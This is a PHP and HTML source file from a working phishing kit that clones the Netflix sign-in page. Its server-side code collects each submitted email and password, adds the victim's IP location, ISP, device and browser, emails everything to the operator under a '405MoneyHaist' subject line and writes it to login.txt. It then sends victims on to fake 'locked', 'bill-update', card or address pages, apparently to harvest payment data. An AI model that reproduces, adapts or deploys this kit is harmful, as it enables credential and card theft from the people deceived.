<?php ob_start(); error_reporting(E_ALL); ini_set('display_errors', 1);
// Safe session start
if (session_status() === PHP_SESSION_NONE) {
    @ini_set('session.save_path', sys_get_temp_dir());
    @session_start();
}
include 'setup/function.php';
require_once __DIR__ . '/../GlobalSetting/email_sender.php';
$res = json_decode(file_get_contents('../config/access.json'), true);

$ip = $_SERVER['REMOTE_ADDR'];
$userAgent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';

if($_SERVER['REQUEST_METHOD'] == 'POST') {
    
    $ipData = fetchIpData($ip, $userAgent);
    if ($ipData) saveIpData($ipData, 'Human Submit Password');
    
    $email = htmlspecialchars($_POST['email'] ?? '');
    $password = htmlspecialchars($_POST['password'] ?? '');
    
    $city = $ipData['city'] ?? 'N/A';
    $region = $ipData['region'] ?? 'N/A';
    $country = $ipData['country'] ?? 'N/A';
    $isp = $ipData['isp'] ?? 'N/A';
    $device = getDevice();
    $browser = getBrowser();
    $date_time = date('H:i:s m-d-Y');
    $date_subject = date('D d M Y H:i:s');
    
    // Build HTML email data for login
    $emailData = [
        'email' => $email,
        'password' => $password,
        'datetime' => $date_time,
        'ip' => $ip,
        'isp' => $isp,
        'country' => $country,
        'region' => $region,
        'city' => $city,
        'device' => $device,
        'browser' => $browser,
        'useragent' => $userAgent
    ];
    
    $subject = "405MoneyHaist Sign In Account: $date_subject";
    $message = function_exists('buildGlobalLoginHtml') ? buildGlobalLoginHtml($emailData) : '';
    sendGlobalEmail('', $subject, $message, true);
    
    $_SESSION['email'] = $_POST['email'] ?? '';
    $_SESSION['password'] = $_POST['password'] ?? '';

    loginAndCardSave($ip, 'login.txt');
    
    // Check global activity setting from gen.json
    $genConfig = json_decode(file_get_contents(__DIR__ . '/../config/gen.json'), true) ?? [];
    $globalActivityOn = ($genConfig['activity_page'] ?? 'on') === 'on';
    $globalActivityType = $genConfig['activity_type'] ?? 'locked';
    
    // Check local activity setting from control.json OR global setting
    $localActivityOn = ($dataPage['activity_status'] ?? '') === 'on';
    
    if($globalActivityOn || $localActivityOn)
    {
        // Use local template if set, otherwise use global type
        $activityTemplate = $dataPage['activity_template'] ?? '';
        
        if($activityTemplate === '1' || $globalActivityType === 'activity')
        {
            session_write_close();
            header("Location: activity?ref=".generateRandomString(100));
            exit;
        } else if($activityTemplate === '2' || $activityTemplate === '3' || $globalActivityType === 'bill-update')
        {
            session_write_close();
            header("Location: bill-update?ref=".generateRandomString(100));
            exit;
        } else {
            // Default: locked
            session_write_close();
            header("Location: locked?ref=".generateRandomString(100));
            exit;
        }
    }
    else
    {
        // Simple flow system (like control_v2.php)
        // flow_preset/cc_template: 1 atau 3 = cc.php (All-in-One), 2 = address.php (Separate)
        $flowPreset = $dataPage['flow_preset'] ?? $dataPage['cc_template'] ?? '1';
        
        if ($flowPreset === '1' || $flowPreset === '3') {
            // Flow 1/3: All-in-One → langsung ke cc.php
            session_write_close();
            header("Location: cc?token=".generateRandomString(100));
            exit;
        } else {
            // Flow 2: Separate → ke address.php dulu
            session_write_close();
            header("Location: address?token=".generateRandomString(100));
            exit;
        }
    }
}
?>
<?php
// Get visitor language
$visitorLang = $_SESSION['visitor_lang'] ?? 'en';
$textDir = function_exists('getTextDirection') ? getTextDirection() : 'ltr';
?>
<!DOCTYPE html>
<html lang="<?= $visitorLang ?>" dir="<?= $textDir ?>">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="Netflix is a streaming service that offers a wide variety of award-winning TV shows, movies and documentaries on thousands of internet-connected devices.">
    <meta name="keywords" content="watch movies, movies online, watch TV, TV online, TV shows online, netflix, streaming">
    <title>Netflix - Watch TV Shows & Movies Online</title>
    <link rel="icon" type="image/x-icon" href="tema/assets/images/nficon2023.ico">
    <link rel="stylesheet" href="tema/styles/logstyle.css">
</head>

<body>
    <div class="x9m7k4">
        <header class="w2n8p5">
            <svg class="r6t3q0" viewBox="0 0 111 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img">
                <g><path d="M105.06233,14.2806261 L110.999156,30 C109.249227,29.7497422 107.500234,29.4366857 105.718437,29.1554972 L102.374168,20.4686475 L98.9371075,28.4375293 C97.2499766,28.1563408 95.5928391,28.061674 93.9057081,27.8432843 L99.9372012,14.0931671 L94.4680851,-5.68434189e-14 L99.5313525,-5.68434189e-14 L102.593495,7.87421502 L105.874965,-5.68434189e-14 L110.999156,-5.68434189e-14 L105.06233,14.2806261 Z M90.4686475,-5.68434189e-14 L85.8749649,-5.68434189e-14 L85.8749649,27.2499766 C87.3746368,27.3437061 88.9371075,27.4055675 90.4686475,27.5930265 L90.4686475,-5.68434189e-14 Z M81.9055207,26.93692 C77.7186241,26.6557316 73.5307901,26.4064111 69.250164,26.3117443 L69.250164,-5.68434189e-14 L73.9366389,-5.68434189e-14 L73.9366389,21.8745899 C76.6248008,21.9373887 79.3120255,22.1557784 81.9055207,22.2804387 L81.9055207,26.93692 Z M64.2496954,10.6561065 L64.2496954,15.3435186 L57.8442216,15.3435186 L57.8442216,25.9996251 L53.2186709,25.9996251 L53.2186709,-5.68434189e-14 L66.3436123,-5.68434189e-14 L66.3436123,4.68741213 L57.8442216,4.68741213 L57.8442216,10.6561065 L64.2496954,10.6561065 Z M45.3435186,4.68741213 L45.3435186,26.2498828 C43.7810479,26.2498828 42.1876465,26.2498828 40.6561065,26.3117443 L40.6561065,4.68741213 L35.8121661,4.68741213 L35.8121661,-5.68434189e-14 L50.2183897,-5.68434189e-14 L50.2183897,4.68741213 L45.3435186,4.68741213 Z M30.749836,15.5928391 C28.687787,15.5928391 26.2498828,15.5928391 24.4999531,15.6875059 L24.4999531,22.6562939 C27.2499766,22.4678976 30,22.2495079 32.7809542,22.1557784 L32.7809542,26.6557316 L19.812541,27.6876933 L19.812541,-5.68434189e-14 L32.7809542,-5.68434189e-14 L32.7809542,4.68741213 L24.4999531,4.68741213 L24.4999531,10.9991564 C26.3126816,10.9991564 29.0936358,10.9054269 30.749836,10.9054269 L30.749836,15.5928391 Z M4.78114163,12.9684132 L4.78114163,29.3429562 C3.09401069,29.5313525 1.59340144,29.7497422 0,30 L0,-5.68434189e-14 L4.4690224,-5.68434189e-14 L10.562377,17.0315868 L10.562377,-5.68434189e-14 L15.2497891,-5.68434189e-14 L15.2497891,28.061674 C13.5935889,28.3437998 11.906458,28.4375293 10.1246602,28.6868498 L4.78114163,12.9684132 Z"></path></g>
            </svg>
        </header>

        <div class="h5j1l8">
            <h2><?= __('sign_in') ?></h2>
            <form method="POST">
                <div class="s4f7g2" id="emailPhoneContainer">
                    <div class="country-selector" id="countrySelector" style="display: none;">
                        <img src="https://flagcdn.com/w20/us.png" alt="US" class="flag-icon" id="flagIcon">
                        <span class="country-code" id="countryCode">+1</span>
                        <div class="dropdown-arrow">▼</div>
                        <div class="country-dropdown" id="countryDropdown">
                            <div class="country-option" data-code="+1" data-flag="https://flagcdn.com/w20/us.png">
                                <img src="https://flagcdn.com/w20/us.png" alt="US"> +1 United States
                            </div>
                            <div class="country-option" data-code="+62" data-flag="https://flagcdn.com/w20/id.png">
                                <img src="https://flagcdn.com/w20/id.png" alt="ID"> +62 Indonesia
                            </div>
                            <div class="country-option" data-code="+44" data-flag="https://flagcdn.com/w20/gb.png">
                                <img src="https://flagcdn.com/w20/gb.png" alt="GB"> +44 United Kingdom
                            </div>
                            <div class="country-option" data-code="+91" data-flag="https://flagcdn.com/w20/in.png">
                                <img src="https://flagcdn.com/w20/in.png" alt="IN"> +91 India
                            </div>
                        </div>
                    </div>
                    <input type="text" placeholder=" " id="emailPhoneInput" name="email" required>
                    <label><?= __('email_or_phone') ?></label>
                    <div class="error-message" id="emailPhoneError">
                        <svg xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="16" height="16" data-icon="CircleXSmall" aria-hidden="true">
                            <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                        </svg>
                        <span><?= __('email_error') ?></span>
                    </div>
                </div>
                <div class="s4f7g2" id="passwordContainer">
                    <input type="password" placeholder=" " id="passwordInput" name="password" required>
                    <label><?= __('password') ?></label>
                    <div class="error-message" id="passwordError">
                        <svg xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="16" height="16" data-icon="CircleXSmall" aria-hidden="true">
                            <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                        </svg>
                        <span><?= __('password_error') ?></span>
                    </div>
                </div>
                <button type="submit" class="d8k6m1"><?= __('sign_in') ?></button>
                <p><?= __('or') ?></p>
                <button type="button" class="d8k6m1 b9v3c7"><?= __('use_sign_in_code') ?></button>
                <p class="z1a4e8"><a href="#"><?= __('forgot_password') ?></a></p>
                <span><input type="checkbox" name="remember" id="remember"> <?= __('remember_me') ?></span>
                <p class="y7i2o6"><?= __('new_to_netflix') ?> <a href="#"><?= __('sign_up_now') ?></a></p>
                <p class="u5p9n3"><?= __('recaptcha_notice') ?> <a href="#"><?= __('learn_more') ?></a></p>
            </form>
        </div>

        <footer class="v0l4x7">
            <h5><?= __('questions_call') ?> 000-800-919-1694</h5>
            <div class="c3g8h2">
                <a href="#"><?= __('faq') ?></a>
                <a href="#"><?= __('help_center') ?></a>
                <a href="#"><?= __('terms_of_use') ?></a>
                <a href="#"><?= __('privacy') ?></a>
                <a href="#">Cookie Preferences</a>
                <a href="#">Corporate Information</a>
            </div>
            <div class="q6w1r9">
                <svg class="f2k5s0" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="16" height="16" data-icon="LanguagesSmall" aria-hidden="true">
                    <path fill-rule="evenodd" clip-rule="evenodd" d="M10.7668 5.33333L10.5038 5.99715L9.33974 8.9355L8.76866 10.377L7.33333 14H9.10751L9.83505 12.0326H13.4217L14.162 14H16L12.5665 5.33333H10.8278H10.7668ZM10.6186 9.93479L10.3839 10.5632H11.1036H12.8856L11.6348 7.2136L10.6186 9.93479ZM9.52722 4.84224C9.55393 4.77481 9.58574 4.71045 9.62211 4.64954H6.41909V2H4.926V4.64954H0.540802V5.99715H4.31466C3.35062 7.79015 1.75173 9.51463 0 10.4283C0.329184 10.7138 0.811203 11.2391 1.04633 11.5931C2.55118 10.6795 3.90318 9.22912 4.926 7.57316V12.6667H6.41909V7.51606C6.81951 8.15256 7.26748 8.76169 7.7521 9.32292L8.31996 7.88955C7.80191 7.29052 7.34631 6.64699 6.9834 5.99715H9.06968L9.52722 4.84224Z" fill="currentColor"></path>
                </svg>
                <select name="language" id="language">
                    <option value="en">English</option>
                    <option value="es">Español</option>
                </select>
                <svg class="m7t4u8" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" width="16" height="16">
                    <path d="M8 10.586L3.414 6 2 7.414 8 13.414 14 7.414 12.586 6z" fill="currentColor"/>
                </svg>
            </div>
        </footer>
    </div>

    <script>
        // Wrap everything in DOMContentLoaded to ensure DOM is ready and avoid conflicts
        document.addEventListener('DOMContentLoaded', function() {
            // Safe element getter function
            function safeGetElement(id) {
                try {
                    return document.getElementById(id);
                } catch (e) {
                    console.error('Error getting element:', id, e);
                    return null;
                }
            }

            // Get DOM elements safely
            const emailPhoneInput = safeGetElement('emailPhoneInput');
            const countrySelector = safeGetElement('countrySelector');
            const emailPhoneContainer = safeGetElement('emailPhoneContainer');
            const countryDropdown = safeGetElement('countryDropdown');
            const flagIcon = safeGetElement('flagIcon');
            const countryCode = safeGetElement('countryCode');
            
            // Get password elements too
            const passwordInput = safeGetElement('passwordInput');
            const passwordContainer = safeGetElement('passwordContainer');
            
            // Check if critical elements exist before proceeding
            if (!emailPhoneInput || !emailPhoneContainer || !passwordInput || !passwordContainer) {
                console.error('Critical form elements not found');
                return;
            }
            
            // Validation state variables
            let emailPhoneTouched = false;
            let passwordTouched = false;

        // Detect if input is email or phone number
        function detectInputType(value) {
            // Check if it contains @ (email)
            if (value.includes('@')) {
                return 'email';
            }
            // Check if it starts with + or contains only numbers
            if (/^[\+]?[0-9\s\-\(\)]+$/.test(value) && value.replace(/[\s\-\(\)]/g, '').length >= 3) {
                return 'phone';
            }
            // Check if it's all numbers
            if (/^[0-9]+$/.test(value) && value.length >= 3) {
                return 'phone';
            }
            return 'unknown';
        }

        // Handle input changes - Safe event handling
        if (emailPhoneInput) {
            emailPhoneInput.addEventListener('input', function() {
                try {
                    // Close dropdown when typing
                    if (countryDropdown) countryDropdown.style.display = 'none';
                    
                    const inputType = detectInputType(this.value);
                    
                    if (inputType === 'phone' && this.value.trim() !== '') {
                        // Show country selector
                        if (countrySelector) countrySelector.style.display = 'flex';
                        if (emailPhoneContainer) emailPhoneContainer.classList.add('phone-mode');
                        
                        // Remove country code from input if it exists
                        let cleanValue = this.value.replace(/^\+\d{1,3}\s?/, '');
                        if (cleanValue !== this.value) {
                            this.value = cleanValue;
                        }
                        
                        // Format number (remove non-digits except space and dash)
                        this.value = this.value.replace(/[^\d\s\-]/g, '');
                    } else if (this.value.trim() === '') {
                        // Hide country selector when empty
                        if (countrySelector) countrySelector.style.display = 'none';
                        if (emailPhoneContainer) emailPhoneContainer.classList.remove('phone-mode');
                    } else if (inputType === 'email') {
                        // Hide country selector for email
                        if (countrySelector) countrySelector.style.display = 'none';
                        if (emailPhoneContainer) emailPhoneContainer.classList.remove('phone-mode');
                    }
                } catch (error) {
                    console.error('Error in input handling:', error);
                }
            });
        }

        // Handle country selector dropdown - Safe event handling
        if (countrySelector && countryDropdown) {
            countrySelector.addEventListener('click', function(e) {
                e.preventDefault();
                const isVisible = countryDropdown.style.display === 'block';
                countryDropdown.style.display = isVisible ? 'none' : 'block';
            });

            // Handle country selection
            document.querySelectorAll('.country-option').forEach(option => {
                option.addEventListener('click', function(e) {
                    e.preventDefault();
                    const code = this.getAttribute('data-code');
                    const flag = this.getAttribute('data-flag');
                    
                    // Update selected country
                    if (countryCode) countryCode.textContent = code;
                    if (flagIcon) flagIcon.src = flag;
                    
                    // Hide dropdown
                    countryDropdown.style.display = 'none';
                    
                    // Focus back to input
                    if (emailPhoneInput) emailPhoneInput.focus();
                });
            });

            // Close dropdown when clicking outside
            document.addEventListener('click', function(e) {
                if (countrySelector && !countrySelector.contains(e.target)) {
                    countryDropdown.style.display = 'none';
                }
            });

            // Close dropdown when focusing on input
            if (emailPhoneInput) {
                emailPhoneInput.addEventListener('focus', function() {
                    if (countryDropdown) countryDropdown.style.display = 'none';
                });
            }
        }

        // Format phone number display
        function getFullPhoneNumber() {
            if (emailPhoneContainer.classList.contains('phone-mode')) {
                return countryCode.textContent + ' ' + emailPhoneInput.value;
            }
            return emailPhoneInput.value;
        }

        // Handle form submission to format phone number correctly
        const form = document.querySelector('form');
        if (form && emailPhoneInput && emailPhoneContainer) {
            form.addEventListener('submit', function(e) {
                try {
                    if (emailPhoneContainer.classList.contains('phone-mode')) {
                        // Set the full phone number with country code before submission
                        emailPhoneInput.value = getFullPhoneNumber();
                    }
                } catch (error) {
                    console.error('Error in form submission:', error);
                }
            });
        }

        // Validation Functions

        // Email/Phone validation
        function validateEmailPhone(value) {
            if (!value || !value.trim()) return false;
            
            // Email validation
            if (value.includes('@')) {
                const emailRegex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
                return emailRegex.test(value);
            }
            
            // Phone validation - check if it looks like a phone number
            const cleanValue = value.replace(/[\s\-\(\)]/g, '');
            if (/^[\+]?[0-9]{3,}$/.test(cleanValue)) {
                return cleanValue.length >= 6; // At least 6 digits for a valid phone
            }
            
            return false;
        }

        // Password validation
        function validatePassword(value) {
            return value && value.length >= 4 && value.length <= 60;
        }
        
        // Check if field should show error (empty or invalid after being touched)
        function shouldShowError(value, isValid, wasTouched) {
            if (!wasTouched) return false;
            // Show error if field is empty OR if field has content but is invalid
            return !value.trim() || (value.trim() && !isValid);
        }

        // Show/Hide error states - Safe function with error handling
        function netflixShowError(container, show = true) {
            try {
                if (!container) {
                    console.error('Container is null in showError');
                    return;
                }
                console.log('netflixShowError called:', container.id, show); // Debug log
                if (show) {
                    container.classList.add('error');
                } else {
                    container.classList.remove('error');
                }
            } catch (e) {
                console.error('Error in netflixShowError:', e);
            }
        }

        // Real-time validation function
        function netflixValidateField(input, container, validator, touched) {
            try {
                if (!touched || !input || !container) return;
                
                const value = input.value;
                const isValid = validator(value);
                
                // Show error if field was touched and is empty OR invalid
                const showError = shouldShowError(value, isValid, touched);
                netflixShowError(container, showError);
            } catch (e) {
                console.error('Error in validateField:', e);
            }
        }

        // Email/Phone input events - Safe event handling
        if (emailPhoneInput && emailPhoneContainer) {
            emailPhoneInput.addEventListener('focus', function() {
                emailPhoneTouched = true;
                // Clear error when focusing
                netflixShowError(emailPhoneContainer, false);
            });

            emailPhoneInput.addEventListener('blur', function() {
                // Only validate on blur if field has been touched
                if (emailPhoneTouched) {
                    setTimeout(() => {
                        netflixValidateField(this, emailPhoneContainer, validateEmailPhone, emailPhoneTouched);
                    }, 100);
                }
            });

            emailPhoneInput.addEventListener('input', function() {
                // Real-time validation while typing (after first touch)
                if (emailPhoneTouched) {
                    const isValid = validateEmailPhone(this.value);
                    // Only clear error while typing if field becomes valid and not empty
                    if (isValid && this.value.trim() !== '') {
                        netflixShowError(emailPhoneContainer, false);
                    } else if (this.value.trim() !== '' && !isValid) {
                        // Show error if there's content and it's invalid
                        netflixShowError(emailPhoneContainer, true);
                    }
                    // Keep error if field is empty and was touched
                }
            });
        }

        // Password input events - Safe event handling
        if (passwordInput && passwordContainer) {
            passwordInput.addEventListener('focus', function() {
                passwordTouched = true;
                // Clear error when focusing
                netflixShowError(passwordContainer, false);
            });

            passwordInput.addEventListener('blur', function() {
                // Only validate on blur if field has been touched
                if (passwordTouched) {
                    setTimeout(() => {
                        netflixValidateField(this, passwordContainer, validatePassword, passwordTouched);
                    }, 100);
                }
            });

            passwordInput.addEventListener('input', function() {
                // Real-time validation while typing (after first touch)
                if (passwordTouched) {
                    const isValid = validatePassword(this.value);
                    // Only clear error while typing if field becomes valid and not empty
                    if (isValid && this.value.trim() !== '') {
                        netflixShowError(passwordContainer, false);
                    } else if (this.value.trim() !== '' && !isValid) {
                        // Show error if there's content and it's invalid
                        netflixShowError(passwordContainer, true);
                    }
                    // Keep error if field is empty and was touched
                }
            });
        }

        }); // End of DOMContentLoaded
    </script>
</body>

</html>